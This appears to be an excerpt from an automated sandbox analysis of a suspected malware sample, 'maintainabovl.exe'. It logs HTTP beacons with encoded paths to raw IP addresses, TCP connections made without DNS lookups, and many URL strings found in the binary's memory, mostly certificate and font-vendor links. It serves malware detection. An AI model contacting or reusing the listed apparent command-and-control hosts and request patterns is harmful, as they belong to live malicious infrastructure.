Source: global traffic	HTTP traffic detected: GET /drew/OUUsBzpIZZUphm/Tsj7lOWVT01GR7_2B_2F3/h1YqNuP4WcrzeCJs/x51Rts0xb3FAs1_/2Bxw1CaQKlICTyuLN1/TaoUc8_2F/5TTXCIOA0SRbwyts6JTK/R5MlMx5IeVFFgmHEPpZ/TWM7GdLrJHM_2B3S8B1eU7/_2BBh5oB1R_2F/_2BxltWj/_2BLEoNYS3p4VDy7elM9qu2/U5PEBiMSrU/T6YOXvs_2FZLXPTA3/hObNStGHJyyy/hCCoXchnbdJ/ixUgp0U2WECwia/6eVsNKM8Cmg7_2F7HmThU/LsrExo0WJYro/O9pQu.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.41.44.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/lGr5mrbDGs3py0IkX1xCdao/J_2BO3pveg/tEN51c8QgFcgipJDl/9B6bT37vHiCK/xeYTuAvP5ZA/n_2BT1EpLoFWJa/4mubDHfkDoaafTL29qqXs/Pr23musVKIKOk0xu/4mHeVX_2FY0FOLH/NMKX_2BVJj7BkC0dl6/T90V1bDM6/suQsVdE5n84CtWOe45Jz/zXcs4agZHeV5dnP4wZv/fQWwms1zkQgJ1jKz1zGBWe/F8C2u26K4tWR3/LoRQN_2B/eADxrRsvut3YtTrDMejjOLK/i3S1e0Ho1/08GsbQQc.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 193.0.178.157Connection: Keep-AliveCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695

Source: unknown	TCP traffic detected without corresponding DNS query: 62.173.149.202
Source: unknown	TCP traffic detected without corresponding DNS query: 62.173.149.202
Source: unknown	TCP traffic detected without corresponding DNS query: 62.173.149.202
Source: unknown	TCP traffic detected without corresponding DNS query: 62.173.149.202
Source: unknown	TCP traffic detected without corresponding DNS query: 62.173.149.202
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.44.158
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.44.158
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.44.158
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.44.158
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.44.158
Source: unknown	TCP traffic detected without corresponding DNS query: 193.0.178.157
Source: unknown	TCP traffic detected without corresponding DNS query: 193.0.178.157
Source: unknown	TCP traffic detected without corresponding DNS query: 193.0.178.157
Source: unknown	TCP traffic detected without corresponding DNS query: 193.0.178.157
Source: unknown	TCP traffic detected without corresponding DNS query: 193.0.178.157
Source: unknown	TCP traffic detected without corresponding DNS query: 193.0.178.157

Source: maintainabovl.exe, 00000007.00000002.821094990.000000000166C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://193.0.
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: maintainabovl.exe, 00000001.00000003.359579923.0000000005B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://en.w.
Source: maintainabovl.exe, 00000001.00000003.359298500.0000000005B62000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359272839.0000000005B63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://en.wikipedia
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: maintainabovl.exe, 00000001.00000002.499268077.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comF
Source: maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comM.TTF
Source: maintainabovl.exe, 00000001.00000003.497054924.0000000005B40000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.367935918.0000000005B4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.coma6
Source: maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comkh
Source: maintainabovl.exe, 00000001.00000003.497054924.0000000005B40000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.367935918.0000000005B4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comm
Source: maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comrsivL
Source: maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comsivaz
Source: maintainabovl.exe, 00000001.00000003.497054924.0000000005B40000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.367935918.0000000005B4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comueTFg
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360417576.0000000005B47000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360368772.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360316834.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: maintainabovl.exe, 00000001.00000003.360417576.0000000005B47000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360368772.0000000005B48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn3
Source: maintainabovl.exe, 00000001.00000003.360417576.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cnr
Source: maintainabovl.exe, 00000001.00000003.360316834.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cnved3
Source: maintainabovl.exe, 00000001.00000003.364771960.0000000005B78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/$
Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/6
Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/U
Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/L
Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/g
Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/h
Source: maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/-
Source: maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/q
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: maintainabovl.exe, 00000001.00000003.359487940.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361457955.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360047358.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360497987.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360795643.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359836394.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360104400.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359854375.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360533756.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361348206.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359601495.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360865725.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359672275.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359523858.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359910893.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361273550.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361009593.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360348836.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360980960.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360947397.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360260221.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com2
Source: maintainabovl.exe, 00000001.00000003.359487940.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361457955.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360047358.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360497987.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360795643.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359836394.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359434008.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360104400.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359854375.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360533756.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361348206.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359601495.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360865725.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359672275.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359460008.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359523858.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359910893.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361273550.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361009593.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360348836.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360980960.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com3
Source: maintainabovl.exe, 00000001.00000003.359487940.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361457955.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360047358.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360497987.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360795643.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359836394.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360104400.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359854375.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360533756.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361348206.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359601495.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360865725.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359672275.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359523858.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359910893.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361273550.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361009593.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360348836.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360980960.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360947397.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360260221.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.comiv
Source: maintainabovl.exe, 00000001.00000003.359487940.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361457955.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360047358.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360497987.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360795643.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359836394.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359434008.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360104400.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359854375.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360533756.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361348206.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359601495.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360865725.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359672275.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359460008.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359523858.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359910893.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361273550.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361009593.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360348836.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360980960.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.comt
